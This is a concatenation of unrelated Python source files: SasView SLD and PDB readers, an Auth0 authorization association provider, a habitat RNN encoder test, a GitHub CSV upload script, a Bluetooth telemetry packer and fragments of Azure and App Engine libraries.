# check if line starts with "ATOM"
if line[0:6].strip().count('ATM') > 0 or \
line[0:6].strip() == 'ATOM':
# define fields of interest
atom_name = line[12:16].strip()
try:
float(line[12])
atom_name = atom_name[1].upper()
except Exception:
if len(atom_name) == 4:
atom_name = atom_name[0].upper()
elif line[12] != ' ':
atom_name = atom_name[0].upper() + \
atom_name[1].lower()
else:
atom_name = atom_name[0].upper()
_pos_x = float(line[30:38].strip())
_pos_y = float(line[38:46].strip())
_pos_z = float(line[46:54].strip())
pos_x = np.append(pos_x, _pos_x)
pos_y = np.append(pos_y, _pos_y)
pos_z = np.append(pos_z, _pos_z)
try:
val = nsf.neutron_sld(atom_name)[0]
# sld in Ang^-2 unit
val *= 1.0e-6
sld_n = np.append(sld_n, val)
atom = formula(atom_name)
# cm to A units
vol = 1.0e+24 * atom.mass / atom.density / NA
vol_pix = np.append(vol_pix, vol)
except Exception:
logger.error("Error: set the sld of %s to zero"% atom_name)
sld_n = np.append(sld_n, 0.0)
sld_mx = np.append(sld_mx, 0)
sld_my = np.append(sld_my, 0)
sld_mz = np.append(sld_mz, 0)
pix_symbol = np.append(pix_symbol, atom_name)
elif line[0:6].strip().count('CONECT') > 0:
toks = line.split()
num = int(toks[1]) - 1
val_list = []
for val in toks[2:]:
try:
int_val = int(val)
except Exception:
break
if int_val == 0:
break
val_list.append(int_val)
#need val_list ordered
for val in val_list:
index = val - 1
if (pos_x[index], pos_x[num]) in x_line and \
(pos_y[index], pos_y[num]) in y_line and \
(pos_z[index], pos_z[num]) in z_line:
continue
x_line.append((pos_x[num], pos_x[index]))
y_line.append((pos_y[num], pos_y[index]))
z_line.append((pos_z[num], pos_z[index]))
if len(x_line) > 0:
x_lines.append(x_line)
y_lines.append(y_line)
z_lines.append(z_line)
except Exception as exc:
logger.error(exc)
output = MagSLD(pos_x, pos_y, pos_z, sld_n, sld_mx, sld_my, sld_mz)
output.set_conect_lines(x_line, y_line, z_line)
output.filename = os.path.basename(path)
output.set_pix_type('atom')
output.set_pixel_symbols(pix_symbol)
output.set_nodes()
output.set_pixel_volumes(vol_pix)
output.sld_unit = '1/A^(2)'
return output
except Exception:
raise RuntimeError("%s is not a sld file" % path)
def write(self, path, data):
"""
Write
"""
print("Not implemented... ")
class SLDReader(object):
"""
Class to load ascii files (7 columns).
"""
## File type
type_name = "SLD ASCII"
## Wildcards
type = ["sld files (*.SLD, *.sld)|*.sld",
"txt files (*.TXT, *.txt)|*.txt",
"all files (*.*)|*.*"]
## List of allowed extensions
ext = ['.sld', '.SLD', '.txt', '.TXT', '.*']
def read(self, path):
"""
Load data file
:param path: file path
:return MagSLD: x, y, z, sld_n, sld_mx, sld_my, sld_mz
:raise RuntimeError: when the file can't be opened
:raise ValueError: when the length of the data vectors are inconsistent
"""
try:
pos_x = np.zeros(0)
pos_y = np.zeros(0)
pos_z = np.zeros(0)
sld_n = np.zeros(0)
sld_mx = np.zeros(0)
sld_my = np.zeros(0)
sld_mz = np.zeros(0)
try:
# Use numpy to speed up loading
input_f = np.loadtxt(path, dtype='float', skiprows=1,
ndmin=1, unpack=True)
pos_x = np.array(input_f[0])
pos_y = np.array(input_f[1])
pos_z = np.array(input_f[2])
sld_n = np.array(input_f[3])
sld_mx = np.array(input_f[4])
sld_my = np.array(input_f[5])
sld_mz = np.array(input_f[6])
ncols = len(input_f)
if ncols == 8:
vol_pix = np.array(input_f[7])
elif ncols == 7:
vol_pix = None
except Exception:
# For older version of numpy
input_f = open(path, 'rb')
buff = decode(input_f.read())
lines = buff.split('\n')
input_f.close()
for line in lines:
toks = line.split()
try:
_pos_x = float(toks[0])
_pos_y = float(toks[1])
_pos_z = float(toks[2])
_sld_n = float(toks[3])
_sld_mx = float(toks[4])
_sld_my = float(toks[5])
_sld_mz = float(toks[6])
pos_x = np.append(pos_x, _pos_x)
pos_y = np.append(pos_y, _pos_y)
pos_z = np.append(pos_z, _pos_z)
sld_n = np.append(sld_n, _sld_n)
sld_mx = np.append(sld_mx, _sld_mx)
sld_my = np.append(sld_my, _sld_my)
sld_mz = np.append(sld_mz, _sld_mz)
try:
_vol_pix = float(toks[7])
vol_pix = np.append(vol_pix, _vol_pix)
except Exception as exc:
vol_pix = None
except Exception as exc:
# Skip non-data lines
logger.error(exc)
output = MagSLD(pos_x, pos_y, pos_z, sld_n,
sld_mx, sld_my, sld_mz)
output.filename = os.path.basename(path)
output.set_pix_type('pixel')
output.set_pixel_symbols('pixel')
if vol_pix is not None:
output.set_pixel_volumes(vol_pix)
return output
except Exception:
raise RuntimeError("%s is not a sld file" % path)
def write(self, path, data):
"""
Write sld file
:Param path: file path
:Param data: MagSLD data object
"""
if path is None:
raise ValueError("Missing the file path.")
if data is None:
raise ValueError("Missing the data to save.")
x_val = data.pos_x
y_val = data.pos_y
z_val = data.pos_z
vol_pix = data.vol_pix
length = len(x_val)
sld_n = data.sld_n
if sld_n is None:
sld_n = np.zeros(length)
sld_mx = data.sld_mx
if sld_mx is None:
sld_mx = np.zeros(length)
sld_my = np.zeros(length)
sld_mz = np.zeros(length)
else:
sld_my = data.sld_my
sld_mz = data.sld_mz
out = open(path, 'w')
# First Line: Column names
out.write("X Y Z SLDN SLDMx SLDMy SLDMz VOLUMEpix")
for ind in range(length):
out.write("\n%g %g %g %g %g %g %g %g" % \
(x_val[ind], y_val[ind], z_val[ind], sld_n[ind],
sld_mx[ind], sld_my[ind], sld_mz[ind], vol_pix[ind]))
out.close()
class OMFData(object):
"""
OMF Data.
"""
_meshunit = "A"
_valueunit = "A^(-2)"
def __init__(self):
"""
        Init for OMF data
"""
self.filename = 'default'
self.oommf = ''
self.title = ''
self.desc = ''
self.meshtype = ''
self.meshunit = self._meshunit
self.valueunit = self._valueunit
self.xbase = 0.0
self.ybase = 0.0
self.zbase = 0.0
self.xstepsize = 6.0
self.ystepsize = 6.0
self.zstepsize = 6.0
self.xnodes = 10.0
self.ynodes = 10.0
self.znodes = 10.0
self.xmin = 0.0
self.ymin = 0.0
self.zmin = 0.0
self.xmax = 60.0
self.ymax = 60.0
self.zmax = 60.0
self.mx = None
self.my = None
self.mz = None
self.valuemultiplier = 1.
self.valuerangeminmag = 0
self.valuerangemaxmag = 0
def __str__(self):
"""
doc strings
"""
_str = "Type: %s\n" % self.__class__.__name__
_str += "File: %s\n" % self.filename
_str += "OOMMF: %s\n" % self.oommf
_str += "Title: %s\n" % self.title
_str += "Desc: %s\n" % self.desc
_str += "meshtype: %s\n" % self.meshtype
_str += "meshunit: %s\n" % str(self.meshunit)
_str += "xbase: %s [%s]\n" % (str(self.xbase), self.meshunit)
_str += "ybase: %s [%s]\n" % (str(self.ybase), self.meshunit)
_str += "zbase: %s [%s]\n" % (str(self.zbase), self.meshunit)
_str += "xstepsize: %s [%s]\n" % (str(self.xstepsize),
self.meshunit)
_str += "ystepsize: %s [%s]\n" % (str(self.ystepsize),
self.meshunit)
_str += "zstepsize: %s [%s]\n" % (str(self.zstepsize),
self.meshunit)
_str += "xnodes: %s\n" % str(self.xnodes)
_str += "ynodes: %s\n" % str(self.ynodes)
_str += "znodes: %s\n" % str(self.znodes)
_str += "xmin: %s [%s]\n" % (str(self.xmin), self.meshunit)
_str += "ymin: %s [%s]\n" % (str(self.ymin), self.meshunit)
_str += "zmin: %s [%s]\n" % (str(self.zmin), self.meshunit)
_str += "xmax: %s [%s]\n" % (str(self.xmax), self.meshunit)
_str += "ymax: %s [%s]\n" % (str(self.ymax), self.meshunit)
_str += "zmax: %s [%s]\n" % (str(self.zmax), self.meshunit)
_str += "valueunit: %s\n" % self.valueunit
_str += "valuemultiplier: %s\n" % str(self.valuemultiplier)
_str += "ValueRangeMinMag:%s [%s]\n" % (str(self.valuerangeminmag),
self.valueunit)
_str += "ValueRangeMaxMag:%s [%s]\n" % (str(self.valuerangemaxmag),
self.valueunit)
return _str
def set_m(self, mx, my, mz):
"""
Set the Mx, My, Mz values
"""
self.mx = mx
self.my = my
self.mz = mz
class MagSLD(object):
"""
Magnetic SLD.
"""
pos_x = None
pos_y = None
pos_z = None
sld_n = None
sld_mx = None
sld_my = None
sld_mz = None
# Units
_pos_unit = 'A'
_sld_unit = '1/A^(2)'
_pix_type = 'pixel'
def __init__(self, pos_x, pos_y, pos_z, sld_n=None,
sld_mx=None, sld_my=None, sld_mz=None, vol_pix=None):
"""
Init for mag SLD
:params : All should be numpy 1D array
"""
self.is_data = True
self.filename = ''
self.xstepsize = 6.0
self.ystepsize = 6.0
self.zstepsize = 6.0
self.xnodes = 10.0
self.ynodes = 10.0
self.znodes = 10.0
self.has_stepsize = False
self.has_conect = False
self.pos_unit = self._pos_unit
self.sld_unit = self._sld_unit
self.pix_type = 'pixel'
self.pos_x = pos_x
self.pos_y = pos_y
self.pos_z = pos_z
self.sld_n = sld_n
self.line_x = None
self.line_y = None
self.line_z = None
self.sld_mx = sld_mx
self.sld_my = sld_my
self.sld_mz = sld_mz
self.vol_pix = vol_pix
self.sld_m = None
self.sld_phi = None
self.sld_theta = None
self.pix_symbol = None
if sld_mx is not None and sld_my is not None and sld_mz is not None:
self.set_sldms(sld_mx, sld_my, sld_mz)
self.set_nodes()
def __str__(self):
"""
doc strings
"""
_str = "Type: %s\n" % self.__class__.__name__
_str += "File: %s\n" % self.filename
_str += "Axis_unit: %s\n" % self.pos_unit
_str += "SLD_unit: %s\n" % self.sld_unit
return _str
def set_pix_type(self, pix_type):
"""
Set pixel type
:Param pix_type: string, 'pixel' or 'atom'
"""
self.pix_type = pix_type
def set_sldn(self, sld_n):
"""
Sets neutron SLD
"""
if sld_n.__class__.__name__ == 'float':
if self.is_data:
# For data, put the value to only the pixels w non-zero M
is_nonzero = (np.fabs(self.sld_mx) +
np.fabs(self.sld_my) +
np.fabs(self.sld_mz)).nonzero()
self.sld_n = np.zeros(len(self.pos_x))
if len(self.sld_n[is_nonzero]) > 0:
self.sld_n[is_nonzero] = sld_n
else:
self.sld_n.fill(sld_n)
else:
# For non-data, put the value to all the pixels
self.sld_n = np.ones(len(self.pos_x)) * sld_n
else:
self.sld_n = sld_n
def set_sldms(self, sld_mx, sld_my, sld_mz):
r"""
Sets mx, my, mz and abs(m).
""" # Note: escaping
if sld_mx.__class__.__name__ == 'float':
self.sld_mx = np.ones(len(self.pos_x)) * sld_mx
else:
self.sld_mx = sld_mx
if sld_my.__class__.__name__ == 'float':
self.sld_my = np.ones(len(self.pos_x)) * sld_my
else:
self.sld_my = sld_my
if sld_mz.__class__.__name__ == 'float':
self.sld_mz = np.ones(len(self.pos_x)) * sld_mz
else:
self.sld_mz = sld_mz
sld_m = np.sqrt(sld_mx * sld_mx + sld_my * sld_my + \
sld_mz * sld_mz)
self.sld_m = sld_m
def set_pixel_symbols(self, symbol='pixel'):
"""
Set pixel
:Params pixel: str; pixel or atomic symbol, or array of strings
"""
if self.sld_n is None:
return
if symbol.__class__.__name__ == 'str':
self.pix_symbol = np.repeat(symbol, len(self.sld_n))
else:
self.pix_symbol = symbol
def set_pixel_volumes(self, vol):
"""
Set pixel volumes
:Params pixel: str; pixel or atomic symbol, or array of strings
"""
if self.sld_n is None:
return
if vol.__class__.__name__ == 'ndarray':
self.vol_pix = vol
elif vol.__class__.__name__.count('float') > 0:
self.vol_pix = np.repeat(vol, len(self.sld_n))
else:
self.vol_pix = None
def get_sldn(self):
"""
Returns nuclear sld
"""
return self.sld_n
def set_nodes(self):
"""
Set xnodes, ynodes, and znodes
"""
self.set_stepsize()
if self.pix_type == 'pixel':
try:
xdist = (max(self.pos_x) - min(self.pos_x)) / self.xstepsize
ydist = (max(self.pos_y) - min(self.pos_y)) / self.ystepsize
zdist = (max(self.pos_z) - min(self.pos_z)) / self.zstepsize
self.xnodes = int(xdist) + 1
self.ynodes = int(ydist) + 1
self.znodes = int(zdist) + 1
except Exception:
self.xnodes = None
self.ynodes = None
self.znodes = None
else:
self.xnodes = None
self.ynodes = None
self.znodes = None
def set_stepsize(self):
"""
        Set xstepsize, ystepsize, and zstepsize
"""
if self.pix_type == 'pixel':
try:
xpos_pre = self.pos_x[0]
ypos_pre = self.pos_y[0]
zpos_pre = self.pos_z[0]
for x_pos in self.pos_x:
if xpos_pre != x_pos:
self.xstepsize = np.fabs(x_pos - xpos_pre)
break
for y_pos in self.pos_y:
if ypos_pre != y_pos:
self.ystepsize = np.fabs(y_pos - ypos_pre)
break
for z_pos in self.pos_z:
if zpos_pre != z_pos:
self.zstepsize = np.fabs(z_pos - zpos_pre)
break
#default pix volume
self.vol_pix = np.ones(len(self.pos_x))
vol = self.xstepsize * self.ystepsize * self.zstepsize
self.set_pixel_volumes(vol)
self.has_stepsize = True
except Exception:
self.xstepsize = None
self.ystepsize = None
self.zstepsize = None
self.vol_pix = None
self.has_stepsize = False
else:
self.xstepsize = None
self.ystepsize = None
self.zstepsize = None
self.has_stepsize = True
return self.xstepsize, self.ystepsize, self.zstepsize
def set_conect_lines(self, line_x, line_y, line_z):
"""
Set bonding line data if taken from pdb
"""
if line_x.__class__.__name__ != 'list' or len(line_x) < 1:
return
if line_y.__class__.__name__ != 'list' or len(line_y) < 1:
return
if line_z.__class__.__name__ != 'list' or len(line_z) < 1:
return
self.has_conect = True
self.line_x = line_x
self.line_y = line_y
self.line_z = line_z
def _get_data_path(*path_parts):
from os.path import realpath, join as joinpath, dirname, abspath
# in sas/sascalc/calculator; want sas/sasview/test
return joinpath(dirname(realpath(__file__)),
'..', '..', 'sasview', 'test', *path_parts)
def test_load():
"""
Test code
"""
from mpl_toolkits.mplot3d import Axes3D
tfpath = _get_data_path("1d_data", "CoreXY_ShellZ.txt")
ofpath = _get_data_path("coordinate_data", "A_Raw_Example-1.omf")
if not os.path.isfile(tfpath) or not os.path.isfile(ofpath):
raise ValueError("file(s) not found: %r, %r"%(tfpath, ofpath))
reader = SLDReader()
oreader = OMFReader()
output = reader.read(tfpath)
ooutput = oreader.read(ofpath)
foutput = OMF2SLD()
foutput.set_data(ooutput)
import matplotlib.pyplot as plt
fig = plt.figure()
ax = Axes3D(fig)
ax.plot(output.pos_x, output.pos_y, output.pos_z, '.', c="g",
alpha=0.7, markeredgecolor='gray', rasterized=True)
gap = 7
max_mx = max(output.sld_mx)
max_my = max(output.sld_my)
max_mz = max(output.sld_mz)
max_m = max(max_mx, max_my, max_mz)
x2 = output.pos_x+output.sld_mx/max_m * gap
y2 = output.pos_y+output.sld_my/max_m * gap
z2 = output.pos_z+output.sld_mz/max_m * gap
x_arrow = np.column_stack((output.pos_x, x2))
y_arrow = np.column_stack((output.pos_y, y2))
z_arrow = np.column_stack((output.pos_z, z2))
unit_x2 = output.sld_mx / max_m
unit_y2 = output.sld_my / max_m
unit_z2 = output.sld_mz / max_m
color_x = np.fabs(unit_x2 * 0.8)
color_y = np.fabs(unit_y2 * 0.8)
color_z = np.fabs(unit_z2 * 0.8)
colors = np.column_stack((color_x, color_y, color_z))
plt.show()
def test_save():
ofpath = _get_data_path("coordinate_data", "A_Raw_Example-1.omf")
if not os.path.isfile(ofpath):
raise ValueError("file(s) not found: %r"%(ofpath,))
oreader = OMFReader()
omfdata = oreader.read(ofpath)
omf2sld = OMF2SLD()
omf2sld.set_data(omfdata)
writer = SLDReader()
writer.write("out.txt", omf2sld.output)
def test():
"""
Test code
"""
ofpath = _get_data_path("coordinate_data", "A_Raw_Example-1.omf")
if not os.path.isfile(ofpath):
raise ValueError("file(s) not found: %r"%(ofpath,))
oreader = OMFReader()
omfdata = oreader.read(ofpath)
omf2sld = OMF2SLD()
omf2sld.set_data(omfdata)
model = GenSAS()
model.set_sld_data(omf2sld.output)
x = np.linspace(0, 0.1, 11)[1:]
return model.runXY([x, x])
if __name__ == "__main__":
#test_load()
#test_save()
#print(test())
test()
|
StarcoderdataPython
|
3461432
|
from allauth.socialaccount.providers.oauth2.urls import default_urlpatterns
from .provider import AdRollProvider
urlpatterns = default_urlpatterns(AdRollProvider)
|
StarcoderdataPython
|
127927
|
import json
import requests
import base64
from past.builtins import basestring
from auth0_provider import Auth0Provider
class AuthzAssociationProvider(Auth0Provider, object):
"""
"""
def __init__(self, supported_resource_type, owner, owned, collection=None):
super(AuthzAssociationProvider, self).__init__()
self.supported_resource_type = supported_resource_type
self.owner = owner
self.owned = owned
self.collection = collection if collection is not None else '{}s'.format(owned)
@property
def audience(self):
return 'urn:auth0-authz-api'
def is_supported_resource_type(self):
return self.resource_type == self.supported_resource_type
def get_id(self, name):
value = self.get('Value')
if name in value and isinstance(value[name], basestring):
return value[name]
else:
return None
@property
def owner_id(self):
return self.get_id(self.owner)
@property
def owned_id(self):
return self.get_id(self.owned)
def is_valid_request(self):
if super(AuthzAssociationProvider, self).is_valid_request():
if self.request_type == 'Create' or self.request_type == 'Update':
value = self.get('Value')
if self.owner_id is None:
self.fail('missing property "{s.owner}" or not a string.'.format(s=self))
return False
if self.owned_id is None:
self.fail('missing property "{s.owned}" or not a string.'.format(s=self))
return False
return True
else:
return False
def get_owner_url(self, owner_id=None):
if owner_id is None:
owner_id = self.owner_id
return '{s.authz_url}/api/{s.owner}s/{owner_id}/{s.collection}'.format(s=self, owner_id=owner_id)
def encode_physical_resource_id(self):
v = json.dumps([self.owner_id, self.owned_id], ensure_ascii=False).encode("utf8")
self.physical_resource_id = base64.b64encode(v).decode('ascii')
def decode_physical_resource_id(self):
owner_id, owned_id = json.loads(base64.b64decode(self.physical_resource_id))
return owner_id, owned_id
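    # Illustrative round trip (values are placeholders): for owner_id 'role-1' and
    # owned_id 'perm-2' the physical resource id is the base64 of '["role-1", "perm-2"]',
    # and decode_physical_resource_id() recovers ('role-1', 'perm-2') from it.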
def create_or_update(self):
self.add_authorization_header()
r = requests.patch(self.get_owner_url(), headers=self.headers, json=[self.owned_id])
if r.status_code == 200 or r.status_code == 204 or r.status_code == 201:
self.encode_physical_resource_id()
else:
self.fail('create {s.owner} failed with code {r.status_code}, {r.text}'.format(s=self, r=r))
def create(self):
self.create_or_update()
if self.status == 'FAILED':
self.physical_resource_id = 'could-not-create'
def update(self):
self.create_or_update()
def delete(self):
if self.physical_resource_id == 'could-not-create':
return
self.add_authorization_header()
owner_id, owned_id = self.decode_physical_resource_id()
r = requests.delete(self.get_owner_url(owner_id), headers=self.headers, json=[owned_id])
if r.status_code != 200 and r.status_code != 204:
self.fail('delete failed with code {r.status_code}, {r.text}'.format(r=r))
|
StarcoderdataPython
|
313496
|
import logging
# Log certificate warnings to 'warnings.log'.
class MyFilter(object):
def __init__(self, level):
self.__level = level
def filter(self, logRecord):
return logRecord.levelno == self.__level
def log_warnings():
handler = logging.FileHandler('warnings.log')
logging.captureWarnings(True)
logger = logging.getLogger('py.warnings')
logger.setLevel(logging.WARNING)
logger.addHandler(handler)
handler.addFilter(MyFilter(logging.WARNING))
logger = logging.getLogger('novaclient.api_versions')
logger.setLevel(logging.WARNING)
logger.addHandler(handler)
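# Example usage (illustrative): call log_warnings() once at startup; warnings
# captured through the warnings module are then written to 'warnings.log'.
#
#   import warnings
#   log_warnings()
#   warnings.warn("certificate verification is disabled")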
|
StarcoderdataPython
|
6688736
|
<reponame>Arun-Singh-Chauhan-09/Supply-demand-forecasting
from order import ExploreOrder
import matplotlib.pyplot as plt
import seaborn as sns
sns.set(color_codes=True)
from utility.datafilepath import g_singletonDataFilePath
from visualization import visualizeData
import numpy as np
import math
class VisualizeTestData(visualizeData):
def __init__(self):
ExploreOrder.__init__(self)
self.gapdf = self.load_gapdf(g_singletonDataFilePath.getTest1Dir())
return
def run(self):
self.disp_gap_bytimeiid()
# self.disp_gap_bydistrict()
# self.disp_gap_bydate()
return
if __name__ == "__main__":
obj= VisualizeTestData()
obj.run()
|
StarcoderdataPython
|
202392
|
# 4.12 Paths with Sum
# You are given a binary tree in which each node contains an integer value
# which might be positive or negative.
# Design an algorithm to count the number of paths that sum to a given value.
# The path does not need to start or end at the root or a leaf, but it must go
# downwards, traveling only from parent nodes to child nodes.
|
StarcoderdataPython
|
3454388
|
import hdfsWikipediaVisualizador
#hdfsWikipediaVisualizador.hdfsWikipediaLocal is a dict of the Wikipedia locations from HDFS,
#keyed by ID = {"latitude": latitudeID, "longitude" : longitudeID}
import csvLinkedInVisualizador
#csvLinkedInVisualizador.csvLinkedinLocais is a dict of the LinkedIn locations from the csv,
#keyed by ID = {"latitude": latitudeID, "longitude" : longitudeID}
import pandas as pd
import sys
#os lets us manipulate directories, folders and files
import os
import os.path
from datetime import datetime
intersecction = []
list1 = csvLinkedInVisualizador.csvLinkedinLocais
list2 = hdfsWikipediaVisualizador.hdfsWikipediaLocal
for i in range(1, 2):
print(list1[i])
print(list2[i])
print("elementos da interseção: " + str(len(intersecction)))
|
StarcoderdataPython
|
9744299
|
print("Analisador de triângulo.")
r1 = float(input("Digite a medida da reta 1: "))
r2 = float(input("Digite a medida da reta 2: "))
r3 = float(input("Digite a medida da reta 3: "))
if r1 < r2 + r3 and r2 < r1 + r3 and r3 < r1 + r2:
print("Essas retas podem formar um triângulo!")
if r1 == r2 == r3:
print("Este triângulo é EQUILÁTERO.")
elif r1 != r2 != r3 != r1:
print("Este triângulo será ESCALENO.")
else:
print("Este triânulo é ISÓSCELES.")
else:
print("Essas retas não podem formar um triângulo.")
|
StarcoderdataPython
|
6626278
|
#!/usr/bin/env python3
# Copyright (c) Facebook, Inc. and its affiliates.
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
import pytest
try:
import torch
except ImportError:
torch = None
@pytest.mark.skipif(torch is None, reason="Test requires pytorch")
def test_rnn_state_encoder():
from habitat_baselines.rl.models.rnn_state_encoder import (
build_rnn_state_encoder,
)
device = (
torch.device("cuda")
if torch.cuda.is_available()
else torch.device("cpu")
)
rnn_state_encoder = build_rnn_state_encoder(32, 32, num_layers=2).to(
device=device
)
rnn = rnn_state_encoder.rnn
with torch.no_grad():
for T in [1, 2, 4, 8, 16, 32, 64, 3, 13, 31]:
for N in [1, 2, 4, 8, 3, 5]:
masks = torch.randint(
0, 2, size=(T, N, 1), dtype=torch.bool, device=device
)
inputs = torch.randn((T, N, 32), device=device)
hidden_states = torch.randn(
rnn_state_encoder.num_recurrent_layers,
N,
32,
device=device,
)
outputs, out_hiddens = rnn_state_encoder(
inputs.flatten(0, 1),
hidden_states.permute(1, 0, 2),
masks.flatten(0, 1),
)
out_hiddens = out_hiddens.permute(1, 0, 2)
reference_ouputs = []
reference_hiddens = hidden_states.clone()
for t in range(T):
reference_hiddens = torch.where(
masks[t].view(1, -1, 1),
reference_hiddens,
reference_hiddens.new_zeros(()),
)
x, reference_hiddens = rnn(
inputs[t : t + 1], reference_hiddens
)
reference_ouputs.append(x.squeeze(0))
reference_ouputs = torch.stack(reference_ouputs, 0).flatten(
0, 1
)
assert (
torch.norm(reference_ouputs - outputs).item() < 1e-3
), "Failed on (T={}, N={})".format(T, N)
assert (
torch.norm(reference_hiddens - out_hiddens).item() < 1e-3
), "Failed on (T={}, N={})".format(T, N)
|
StarcoderdataPython
|
1812171
|
<reponame>imamol/license_automation<filename>lib/github.py
from __future__ import print_function
from builtins import input
import requests
from requests.auth import HTTPBasicAuth
import json
import base64
import getpass
import sys
import github3
def _get_sha(username, password, url):
r = requests.get(url,auth=HTTPBasicAuth(username, password))
print(r.text)
if r.status_code < 400:
        data = json.loads(r.text)
        print("Creds validated..")
        return data['sha']
else:
print("Error in accessing github api to uplod file..")
exit()
def upload_file():
username = input("Github username: ")
password = getpass.getpass("Github passsword: ")
url = "https://api.github.ibm.com/repos/abhople/LicenseAutomation/contents/lib/DB_license_sheet.csv"
sha = _get_sha(username, password, url)
with open('lib/DB_license_sheet.csv') as file:
lines = file.read()
PY3 = sys.version_info[0] >= 3
if PY3:
lines = lines.encode()
file_data = base64.b64encode(lines)
file_data = file_data.decode()
else:
file_data = base64.b64encode(lines)
data = json.dumps({'message':'uploading new db', 'content':file_data, 'sha':sha})
r = requests.put(url,data, auth=HTTPBasicAuth(username, password))
if r.status_code < 400:
print("DB_license_sheet.csv uploaded on github")
else:
print("Error in accessing github api to upload file..")
exit()
def create_and_upload_file(username, password, repo, file_name):
gh = github3.login(username=username, password=password)
repository = gh.repository('junawaneshivani', 'build-scripts')
with open(file_name, 'rb') as fd:
contents = fd.read()
try :
repository.create_file(
path=repo,
message='Added generated License File ',
content=contents,
)
except Exception as e:
print (e)
return False
return True
|
StarcoderdataPython
|
6516620
|
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from msrest.serialization import Model
class VaultCertificate(Model):
"""Describes a single certificate reference in a Key Vault, and where the
certificate should reside on the VM.
:param certificate_url: This is the URL of a certificate that has been
uploaded to Key Vault as a secret. For adding a secret to the Key Vault,
see [Add a key or secret to the key
vault](https://docs.microsoft.com/azure/key-vault/key-vault-get-started/#add).
    In this case, your certificate needs to be the Base64 encoding of
the following JSON Object which is encoded in UTF-8: <br><br> {<br>
"data":"<Base64-encoded-certificate>",<br> "dataType":"pfx",<br>
"password":"<<PASSWORD>>"<br>}
:type certificate_url: str
:param certificate_store: For Windows VMs, specifies the certificate store
on the Virtual Machine to which the certificate should be added. The
specified certificate store is implicitly in the LocalMachine account.
<br><br>For Linux VMs, the certificate file is placed under the
/var/lib/waagent directory, with the file name <UppercaseThumbprint>.crt
    for the X509 certificate file and <UppercaseThumbprint>.prv for private
key. Both of these files are .pem formatted.
:type certificate_store: str
"""
_attribute_map = {
'certificate_url': {'key': 'certificateUrl', 'type': 'str'},
'certificate_store': {'key': 'certificateStore', 'type': 'str'},
}
def __init__(self, **kwargs):
super(VaultCertificate, self).__init__(**kwargs)
self.certificate_url = kwargs.get('certificate_url', None)
self.certificate_store = kwargs.get('certificate_store', None)
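# Illustrative sketch (not part of the SDK): building the secret value that
# certificate_url should point to, as described in the docstring above. The
# certificate bytes and password are placeholders.
#
#   import base64, json
#   payload = base64.b64encode(json.dumps({
#       "data": "<Base64-encoded-certificate>",
#       "dataType": "pfx",
#       "password": "<password>",
#   }).encode("utf-8")).decode("ascii")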
|
StarcoderdataPython
|
3383760
|
<reponame>fishbigger/echookPi<filename>sendData.py
"""
==================================
BLUETOOTH DATA PACKETING FUNCTIONS
==================================
* The two functions in this section handle packeting the data and sending it over USART to the bluetooth module. The two functions are
* identically named so are called in the same way, however the first is run if the value passed to it is a float and the second is
* run if the value passed into it is an integer (an override function). For all intents and purposes you can ignore this and simply call
* 'sendData(identifier, value);' using one of the defined identifiers and either a float or integer value to send information over BT.
*
* identifier: see definitions at start of code
* value: the value to send (typically some calculated value from a sensor)
"""
import random
def convertData(indentifier, value):
value = float(value)
if value == 0:
#It is impossible to send null bytes over Serial connection
#so instead we define zero as 0xFF or 11111111 i.e. 255
dataByte1 = 0xFF
dataByte2 = 0xFF
elif value <= 127:
#Values under 128 are sent as a float
#i.e. value = dataByte1 + dataByte2 / 100
integer = int(value)
tempDecimal = (value - integer) * 100;
decimal = int(tempDecimal)
dataByte1 = integer
dataByte2 = decimal
if decimal == 0:
dataByte2 = 0xFF
if integer == 0:
dataByte1 = 0xff
else:
#Values above 127 are sent as integer
#i.e. value = dataByte1 * 100 + dataByte2
hundreds = int(value / 100)
tens = value - hundreds * 100
dataByte1 = hundreds
dataByte1 += 128
dataByte2 = int(tens)
if tens == 0:
dataByte2 = 0xFF
if hundreds == 0:
dataByte1 = 0xFF
    # Pack the two values into single bytes for transmission over the serial link
    return dataByte1.to_bytes(1, "big") + dataByte2.to_bytes(1, "big")
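# Examples of the packing scheme (illustrative):
#   value 0    -> bytes 0xFF 0xFF  (zero is sent as two 0xFF bytes)
#   value 12.5 -> bytes 0x0C 0x32  (< 128: integer part, then two decimal digits)
#   value 250  -> bytes 0x82 0x32  (>= 128: hundreds with +128 flag, then remainder)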
try:
dataToSend = convertData("Vt", random.randint(0, 255))
    # The bluetooth serial device expects raw bytes, so open in binary mode
    with open('/dev/rfcomm0', 'wb') as f:
        f.write(dataToSend)
except:
print ("Something went wrong")
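# Illustrative sketch (not part of the original script): the inverse of
# convertData(), mapping the two transmitted bytes back to a float. Accepts
# either raw ints (e.g. frame[0] of a received bytes object) or 1-byte values.
def decodeData(byte1, byte2):
    b1 = byte1[0] if isinstance(byte1, (bytes, bytearray)) else byte1
    b2 = byte2[0] if isinstance(byte2, (bytes, bytearray)) else byte2
    # 0xFF stands in for zero in either byte (null bytes cannot be sent)
    b1 = 0 if b1 == 0xFF else b1
    b2 = 0 if b2 == 0xFF else b2
    if b1 >= 128:
        # values above 127 were packed as hundreds (offset by 128) and tens
        return float((b1 - 128) * 100 + b2)
    # values up to 127 were packed as integer part and two decimal places
    return b1 + b2 / 100.0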
|
StarcoderdataPython
|
329609
|
#!/usr/bin/env python
#
# Copyright 2007 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""A library for managing flags-like configuration that update dynamically.
"""
import logging
import os
import re
import time
if os.environ.get('APPENGINE_RUNTIME') == 'python27':
from google.appengine.api import memcache
from google.appengine.ext import db
from google.appengine.api import validation
from google.appengine.api import yaml_object
else:
try:
from google.appengine.api import memcache
from google.appengine.ext import db
from google.appengine.api import validation
from google.appengine.api import yaml_object
  except ImportError:
from google.appengine.api import memcache
from google.appengine.ext import db
from google.appengine.ext import validation
from google.appengine.ext import yaml_object
